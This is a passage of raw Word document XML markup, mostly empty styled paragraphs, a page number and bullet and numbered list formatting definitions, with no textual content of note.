          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DACA908" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DD757E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F13797" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEE8D5F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B2568B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAEF4F3" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F8020C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22732BE7" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3767F079" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29811B3D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58FEBF5C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40002236" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602D39C6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420E37B2" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367B8E8B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:ind w:right="246"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00377979">
      <w:pgSz w:w="14400" w:h="8100" w:orient="landscape"/>
      <w:pgMar w:top="720" w:right="180" w:bottom="0" w:left="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Regular">
    <w:altName w:val="Roboto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80B08"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C910EC8C"/>
    <w:lvl w:ilvl="0" w:tplc="7F127C0E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="532" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-4"/>
        <w:w w:val="100"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8CAE7DC0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="870" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="100"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B6C8ACDC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1454" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-9"/>
        <w:w w:val="100"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0EC27B9A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1460" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4D88D4C2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2202" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9C4A6DF0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2945" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="283ABCA2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3687" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="228E192C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4430" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="22567EA4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5172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1E167443"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE4C58A0"/>
    <w:lvl w:ilvl="0" w:tplc="87C64BB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1357" w:hanging="253"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="RobotoRegular" w:eastAsia="RobotoRegular" w:hAnsi="RobotoRegular" w:cs="RobotoRegular" w:hint="default"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0C8E057C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2618" w:hanging="253"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C5980B0A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3876" w:hanging="253"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D3944BAA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5134" w:hanging="253"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="05EEC008">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6392" w:hanging="253"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9FC6D6BA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7650" w:hanging="253"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="171AA98A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8908" w:hanging="253"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A17CAC58">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10166" w:hanging="253"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4CC44A10">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11424" w:hanging="253"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="310A0A14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85C0BA78"/>
    <w:lvl w:ilvl="0" w:tplc="2966BB32">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="745" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:spacing w:val="-4"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="18166D92">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1261" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:spacing w:val="-4"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="11B6D614">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2668" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="41DCFF56">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4077" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2E642478">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5486" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="83B09BD4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6895" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="BB180924">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8304" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="ED9E486C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9713" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CC14D604">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11122" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3CE258D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EABE0E52"/>
    <w:lvl w:ilvl="0" w:tplc="A08ED54E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="959" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="100"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C45465B4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1415" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0CD0EAB8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1870" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="53544860">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2326" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E7CE6C94">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2781" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CDACF388">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3236" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="530A30CE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3692" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C0727234">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4147" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="92FEC1F4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4603" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5DEB3B45"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E702E092"/>
    <w:lvl w:ilvl="0" w:tplc="CF1ABD1A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="890" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="100"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1C60F144">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1189" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-3"/>
        <w:w w:val="100"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="485C3E06">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="967" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CB46B1C0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="755" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BD5274BC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="543" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DE1EB54A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="331" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6C70A6FC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="119" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C5E2E590">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="-93" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4AA2BB7E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="-305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65B17EC4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0CBE2928"/>
    <w:lvl w:ilvl="0" w:tplc="3BEA0BB2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="486" w:hanging="214"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="RobotoRegular" w:eastAsia="RobotoRegular" w:hAnsi="RobotoRegular" w:cs="RobotoRegular" w:hint="default"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="100"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1340FED4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1498" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-38"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="CFA8E24E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2882" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5F9681B2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4264" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EC9A6C00">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5646" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BB88D11A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7028" w:hanging="289"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5978A2A0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
